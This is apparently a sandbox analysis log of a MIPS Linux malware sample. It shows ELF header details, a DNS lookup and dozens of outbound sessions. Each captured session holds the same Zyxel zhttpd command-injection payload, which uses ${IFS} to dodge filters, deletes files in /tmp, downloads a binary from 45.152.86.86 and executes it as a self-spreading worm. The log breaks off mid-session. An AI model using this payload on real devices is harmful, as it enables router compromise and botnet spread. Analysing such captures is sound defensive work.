                              .mdebug.abi32PROGBITS0x13e60x2f6480x00x00x0001
                              .shstrtabSTRTAB0x00x2f6480x640x00x0001
                              TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                              LOAD0x00x4000000x4000000x2a0c40x2a0c45.44400x5R E0x10000.init .text .fini .rodata
                              LOAD0x2a0c80x46a0c80x46a0c80x55800x9d501.24920x6RW 0x10000.ctors .dtors .data.rel.ro .data .got .sbss .bss
                              GNU_STACK0x00x00x00x00x00.00000x7RWE0x4
                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                              Mar 31, 2024 08:41:01.381124020 CEST192.168.2.138.8.8.80xe180Standard query (0)a.iruko.topA (IP address)IN (0x0001)false
                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                              Mar 31, 2024 08:41:01.501168013 CEST8.8.8.8192.168.2.130xe180No error (0)a.iruko.top45.152.86.86A (IP address)IN (0x0001)false
                              Session IDSource IPSource PortDestination IPDestination Port
                              0192.168.2.136010263.200.116.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.416707993 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              1192.168.2.1347226160.194.249.238443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417028904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              2192.168.2.1341432201.226.90.102443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417099953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              3192.168.2.135210667.121.215.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417099953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4192.168.2.134921886.90.203.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417129040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              5192.168.2.1338478121.142.96.120443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417273045 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              6192.168.2.1353694110.232.21.199443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417346001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              7192.168.2.1336696213.86.206.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417433023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              8192.168.2.1348972147.113.186.141443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417447090 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              9192.168.2.1358152160.197.45.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417525053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              10192.168.2.1352428136.200.42.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417577028 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              11192.168.2.134480627.32.236.29443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417689085 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              12192.168.2.135943046.252.16.121443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417711973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              13192.168.2.1359662101.49.66.30443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417803049 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              14192.168.2.1336132135.62.75.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417884111 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              15192.168.2.1338118124.49.113.226443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.417979002 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              16192.168.2.1344134166.27.246.103443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418023109 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              17192.168.2.1348430176.5.187.150443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418086052 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              18192.168.2.1359562115.104.81.116443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418114901 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              19192.168.2.1337966220.254.223.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418160915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              20192.168.2.133306634.45.225.89443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418241024 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              21192.168.2.133789071.221.35.215443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418307066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              22192.168.2.1358430144.130.185.155443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418392897 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              23192.168.2.13502901.208.100.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418427944 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              24192.168.2.1348508131.4.177.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418530941 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              25192.168.2.1360008115.237.92.202443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418608904 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              26192.168.2.134397046.208.159.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418673038 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              27192.168.2.13513969.107.126.240443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418687105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              28192.168.2.133935434.59.34.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418800116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              29192.168.2.133768227.191.65.211443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.418874979 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              30192.168.2.1347958177.255.153.248443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419013023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              31192.168.2.1359210182.137.155.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419047117 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              32192.168.2.1358118121.41.203.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419131994 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              33192.168.2.13577909.7.168.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419229031 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              34192.168.2.1332770192.105.4.101443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419277906 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              35192.168.2.1352130223.148.105.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419332027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              36192.168.2.1347334162.198.116.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419356108 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              37192.168.2.134709243.255.138.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419429064 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              38192.168.2.1343506101.152.223.132443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419531107 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              39192.168.2.1342544210.83.219.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419641972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              40192.168.2.13438265.155.224.108443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419706106 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              41192.168.2.1337222191.136.21.110443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419744015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              42192.168.2.1347536173.220.244.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419833899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              43192.168.2.133684235.237.133.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.419883966 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              44192.168.2.135530047.196.255.232443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420015097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              45192.168.2.133450080.26.215.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420095921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              46192.168.2.1341806162.63.200.136443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420176983 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              47192.168.2.1333248147.222.90.14443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420283079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              48192.168.2.1358634140.180.152.91443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420368910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              49192.168.2.13467249.143.94.114443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420442104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              50192.168.2.1355128151.122.234.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420490980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              51192.168.2.134592280.128.31.147443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420547009 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              52192.168.2.133286643.26.142.117443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420666933 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              53192.168.2.1342016162.29.219.244443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420784950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              54192.168.2.135584038.216.174.43443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420901060 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              55192.168.2.1341760143.230.166.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.420945883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              56192.168.2.1342180175.241.249.3443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421026945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              57192.168.2.13597284.214.196.254443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421130896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              58192.168.2.1346196154.27.185.79443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421165943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              59192.168.2.1346116136.255.80.189443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421250105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              60192.168.2.1359720132.89.253.164443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421310902 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              61192.168.2.1335160197.5.98.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421372890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              62192.168.2.1347070144.7.52.11443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421448946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              63192.168.2.1349324201.104.72.46443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421516895 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              64192.168.2.1336468195.100.206.178443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421601057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              65192.168.2.1339092107.107.58.9443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421674967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              66192.168.2.1345548122.36.41.125443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:01.421794891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              67192.168.2.1339288101.237.5.72443
                              TimestampBytes transferredDirectionData
